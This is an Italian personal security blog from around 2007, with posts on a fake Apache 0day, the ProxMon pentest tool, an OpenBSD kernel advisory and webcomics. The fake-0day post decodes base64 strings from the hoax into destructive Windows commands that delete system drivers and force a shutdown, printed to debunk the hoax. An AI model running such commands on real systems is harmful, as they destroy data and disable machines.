QOTD (quote of the day)

Nel momento in cui ci si chiede il significato ed il valore della vita, si è malati.
Sigmund Freud

due mp3 imperdibili :>

Il primo, "symantec in da house!"
http://www.linux.it/~gaetano/tmp/symantec_fancyness.mp3

Un rapper, sponsorizzato da Symantec, che canta "Symantec Revolution! We're giving you sweet solutions!" e che a colpi di "y0 y0" miscela parole come firewall, gotcha e qualcos'altro che non sono riuscito a decrifrare, perche' dopo un po' questa maledetta canzone fa venire i nervi.

E quest'altro:
http://www.linux.it/~gaetano/tmp/italianman.mp3

che - non anticipo nulla - ci riguarda mooooltoo in particolare. :>

you like bukkake? :>

apache 0day? :) nah, fake!

Non leggo parecchio fulldisclosure, anzi diciamo che la leggo ogni tanto, ma non me la faccio arrivare per email. Troppa merda e post inutili. Meglio tramite l'RSS di seclists:

http://seclists.org/rss/fulldisclosure.rss (solo i titoli, niente contenuti)

By the way, come tutti gli hax0rs che si rispettino, ho notato subito quel post su un presunto 0day su apache:

http://seclists.org/fulldisclosure/2007/Mar/0318.html

Letto due secondi, scrollandolo velocemente, e mi sono da subito chiesto che diavolo erano quelle due stringe.

$mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
$int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

Bene, eccovi spiegato l' "arcano" :>

[gz@ghetto:~]% cat -n decodebase.pl
1 use MIME::Base64;
2 my $dance = shift;
3 $uhuh = decode_base64($dance);
4 print "$uhuh\n";

[gz@ghetto:~]% perl decodebase.pl
QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=
@del %SystemRoot%\System32\drivers\*.* /F /S /Q > nul

[gz@ghetto:~]% perl decodebase.pl c2h1dGRvd24gLXMgLWYgLXQgMA==
shutdown -s -f -t 0

Quindi a questo punto è facile capire che è un fake. Fatto male tra l'altro. Ma almeno ci ha provato. :>

p.s. : Se all'inizio del post mettevo "questo messaggio è sponsorizzato dal blackhax0r** e thewhitedude**" poteva sembrare una delle tante "inchieste" in stile paolo attivissimo. ;PPpPPPP

UPDATE: Anche qualcun altro se ne è accorto: http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053057.html

snap preview

Ma non trovate pure voi fastidiosissime le preview di snap che spopolano in quasi tutti i blog o siti personali in questo periodo?

Io non riesco a navigare per piu' di 10 secondi un blog con quelle maledette preview, riescono a far diventare la mia navigazione nervosa. Sono un aborto del web2, non usateli, abbiate pietà. Non facciamoci del male.

comics!

Sono appassionato di web-comics, sul mio aggregatore di RSS (per i curiosi, su MacOSX uso Vienna: http://www.opencommunity.co.uk/vienna2.php) ne ho a bizzeffe.

Li trovo, generalmente, cercando su tapestry, un ottimo aggregatore di URL di webcomics e relativi feed RSS:

Tapestry is a directory of feeds for online comics. They help you to keep up to date from within your favourite news aggregator, especially if you happen to miss a few days. If that doesn't make any sense, take a look at this handy help page from the BBC.

http://www.tapestrycomics.com/

Attualmente ne ha in archivio 226 (si, 226, non ho sbagliato :P), questo lo rende una risorsa indispensabile da consultare almeno 15 minuti al giorno alla ricerca di nuove strisce :)

Comunque, oltre i vari xcvd, dilbert, sexylosers, doonesbury, applegeeks, da qualche tempo ho deciso di seguire pure quelli di SecurityBuddha, di cui vi linko uno dei miei preferiti (uno a caso, perche' alcuni meritano parecchio):



:>

security conference archive

Un archivio pubblico di audio, video e altro tipo di materiale proveniente da
svariate conferenze di sicurezza informatica (blackhat, defcon, toorcon, CCC,
e altre...)

http://mirrors.easynews.com/blackhat/

Davvero molto utile.

tool: proxmon (per web-hax0rs e pentesters)

Verra' rilasciato il 30 Marzo (piu' o meno :P); l'URL ufficiale del progetto è:
http://code.google.com/p/proxmon/

Dalla documentazione (ancora non rilasciata, come proxmon):

Performing a web application penetration test is full of repetitive but essential tasks. ProxMon is an extensible Python based framework that reduces testing effort, improves consistency and reduces errors.
Its use requires limited additional effort as it processes the proxy logs that you’re already generating and reports discovered issues. In addition to penetration testing, ProxMon is useful in QA, developer testing and regression testing scenarios.
Key features:
• automatic value tracing of set cookies, sent cookies, query strings and post parameters across sites
• proxy agnostic
• included library of vulnerability checks
• active testing mode
• cross platform
• open source license
• easy to program extensible python framework

Ed eccovi un esempio di utilizzo e delle potenzialita:

[*] starting ProxMon v1.0.15 (http://www.isecpartners.com)
[*] Copyright (C) 2007, Jonathan Wilkins, iSEC Partners Inc.
[*] Proxmon comes with ABSOLUTELY NO WARRANTY;
[*] This is free software, and you are welcome to redistribute it
[*] under certain conditions; see accompanying file LICENSE for
[*] details on warranty and redistribution details.
[*] Loading support for: WebScarab
[*] Loading Checks ...
- Find interesting comments
- Find cookie values that also are sent on the query string
- Find HTTP Basic or Digest Authentication usage
- Identify frameworks and scripts in use by server
- Find dangerous functions in JavaScript code
- Find offsite redirects
- Find cookies with the secure flag that also get sent cleartext
- Find values set over SSL that later go cleartext
- Find values sent to other domains
- Find common undesirable directories
- Find files that indicate common vulnerabilities
- Find directories that allow directory listing
- Find SSL server configuration issues
- Find directories writable via PUT
[*] 14 checks loaded
[*] Finding available sessions ...
[*] Processing session test/webscarab in test
[*] Running in monitor mode
[*] Monitoring test/webscarab
[*] Parsing existing conversations ...
[*] Interesting comment: XXX in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: bug in http://www.bitland.net:80/ (TIDs: 532)
[*] Interesting comment: TODO in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: ??? in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Interesting comment: !!! in http://scratch.bitland.net:80/ (TIDs: 35)
[*] Cookie value seen on QS: secret1 (Secure, SSL) (TIDs: 16)
[*] Cookie value seen on QS: secret2 (Secure, SSL) (TIDs: 9)
[*] Digest auth seen: Authorization: Digest username='jwilkins', realm='scratchdigest', [snip ...] (TIDs: 34)
[*] Basic auth seen: Authorization: Basic andpbGtpbnM6YXNkZmFzZGY= (TIDs: 31, 32)
[*] IDed framework: scratch.bitland.net:80 is using PHP/5.2.1 (http://www.php.net) (TIDs: 35)
[*] IDed framework: www.isecpartners.com:80 is using YUI/1.2.3 (http://developer.yahoo.com/yui) (TIDs: 16)
[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:15 (TIDs: 35)
[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:16 (TIDs: 35)
[*] Secure cookie value sent clear: secret2 (TIDs: 7, 9)
[*] Secure cookie value sent clear: secret1 (TIDs: 16, 36)
[*] Value set over SSL sent clear: secret2 as secure2 (TIDs: 7)
[*] Value set over SSL sent clear: secret2 as bar (TIDs: 9)
[*] Value set over SSL sent clear: secret1 as foobar (TIDs: 16)
[*] Value set over SSL sent clear: secret1 as asdf (TIDs: 36)
[*] Value (secret1) sent to multiple domains: bitland.net (TIDs: 5, 6, 36)
[*] Value (secret1) sent to multiple domains: isecpartners.com (TIDs: 16)
[*] Bad directory found: /backup/ on scratch.bitland.net:80 (TIDs: 0)
[*] Bad file found: /environ.pl on scratch.bitland.net:80 (TIDs: 0)
[*] Listing of /listable/ on scratch.bitland.net:80 succeeded (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: aNULL null cipher (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: Export strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: 40 bit Export strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: Low strength ciphers (TIDs: 0)
[*] SSL Config issue https://www.bitland.net:443: SSLv2 protocol (TIDs: 0)
[*] Upload to /put/ on scratch.bitland.net:80 succeeded (TIDs: 0)
[*] Parsed 38 existing conversations
[*] Session is not active, no point in monitoring

C'e' ancora da sistemarlo un pochetto (è gia' parecchio stabile, dai test che ho personalmente fatto), da scrivere un paio di plug-in, e da ri-testarlo e stressarlo un pochetto.

Vi consiglio di tenere d'occhio il sito web ufficiale e seguire il progetto :>

Scritto da Jonathan Wilkins, di cui consiglio pure il suo blog tecnico:

http://www.bitland.net/

0p3nbsd hacked. (per l'ENNE-esima volta, con n > 2, ovviamente)

Ohohoh! Il supersicuro (:ppPpPP) OpenBSD vulnerabile, da remoto (!!!!), ad una bella vulnerabilita' in kernel-side. :)

Da qui l'advisory:
http://www.coresecurity.com/?action=item&id=1703

La cosa che mi è caduta subito sott'occhio è stata (in grassetto):

. 2007-02-26: OpenBSD team communicates that the issue is specific to
OpenBSD. OpenBSD no longer uses the term "vulnerability" when
referring to bugs that lead to a remote denial of service attack,
as opposed to bugs that lead to remote control of vulnerable systems
to avoid oversimplifying ("pablumfication") the use of the term.
. 2007-02-26: Core email sent to OpenBSD team explaining that Core
considers a remote denial of service a security issue and therefore
does use the term "vulnerability" to refer to it and that although
remote code execution could not be proved in this specific case,
the possibility should not be discarded. Core requests details about
the bug and if possible an analysis of why the OpenBSD team may or
may not consider the bug exploitable for remote code execution.
. 2007-02-28: OpenBSD team indicates
that the bug results in corruption of mbuf chains and that only IPv6
code uses that mbuf code, there is no user data in the mbuf header
fields that become corrupted and it would be surprising to be able to
run arbitrary code using a bug so deep in the mbuf code. The bug
simply leads to corruption of the mbuf chain.
. 2007-03-05: Core develops proof of concept code that demonstrates
remote code execution in the kernel context by exploiting the mbuf
overflow.
. 2007-03-05: OpenBSD team notified of PoC availability.
. 2007-03-07: OpenBSD team commits fix to OpenBSD 4.0 and 3.9 source
tree branches and releases a "reliability fix" notice on the project's
website.
. 2007-03-08: Core sends final draft advisory to OpenBSD requesting
comments and official vendor fix/patch information.
. 2007-03-09: OpenBSD team changes notice on the project's website to
"security fix" and indicates that Core's advisory should reflect the
requirement of IPv6 connectivity for a successful attack from outside
of the local network.
. 2007-03-12: Advisory updates with fix and workaround information and
with IPv6 connectivity comments from OpenBSD team. The "vendors
contacted" section of the advisory is adjusted to reflect more
accurately the nature of the communications with the OpenBSD team
regarding this issue.
. 2007-03-12: Workaround recommendations revisited. It is not yet
conclusive that the "scrub in inet6" directive will prevent
exploitation. It effectively stops the bug from triggering according
to Core's tests but OpenBSD's source code inspection does not provide
a clear understanding of why that happens. It could just be that the
attack traffic is malformed in some other way that is not meaningful
for exploiting the vulnerability (an error in the exploit code rather
than an effective workaround?). The "scrub" workaround recommendation
is removed from the advisory as precaution.

Possibile che si debba sempre "litigare" per fargli capire le cose?
:> Cmq sembra che adesso (finalmente!) il loro motto sia cambiato :)

Da openbsd.org:

"Only two remote holes in the default install, in more than 10 years!"

Bah, su "only two remote holes" io non ci giurerei cosi' tanto, ma
almeno abbiamo fatto un passo avanti :)

By the way, aggiornate subito i vostri sistemi openbsd, visto e considerato
che CORE ha rilasciato un POC, reperibile su milw0rm:

http://www.milw0rm.com/exploits/3491

cerchi un lavoro da "hacker"? :)

Ehm, io ti "suggerisco" che forse è meglio se vai a fare lo spacciatore! :>

p.s.: guardate bene l'immagine! ;)

spostamento blog

'sera :)

Tranquilli, sono sempre vivo. Sto semplicemente riorganizzando qualcosa nella mia vita, quindi, per tanti motivi, non ho tempo di scrivere sul blog. Pero' in questo periodo ho deciso di muoverlo e sgravare ILS dall'hosting di questa inutilissima risorsa.

Quindi aggiornate i vostri riferimenti, da oggi il blog è raggiungibile su:

http://blog.bacarospo.net
(il vecchio restera' up & running ancora per qualche giorno)

Ed il rispettivo feed RSS su:

http://feeds.feedburner.com/gaetano

Per l'importazione dei post da wordpress a blogspot (la piattaforma dove gira il mio nuovo blog) ho utilizzato blogsync2, reperibile da:

http://zeaster.blogspot.com/2007/01/tool-that-imports-all-posts-from_25.html

L'importazione funziona piu' o meno bene (qualche problemino lo da', ma con un po' di olio di gomito si capisce subito come sistemare il tool per adattarlo alla propria situazione), pero' non ho capito perche' sul Planet di ILS (http://planet.linux.it ) mi ha segnato post vecchi, addirittura del 2004, come "recenti".

Boh. Me ne faro' una ragione :>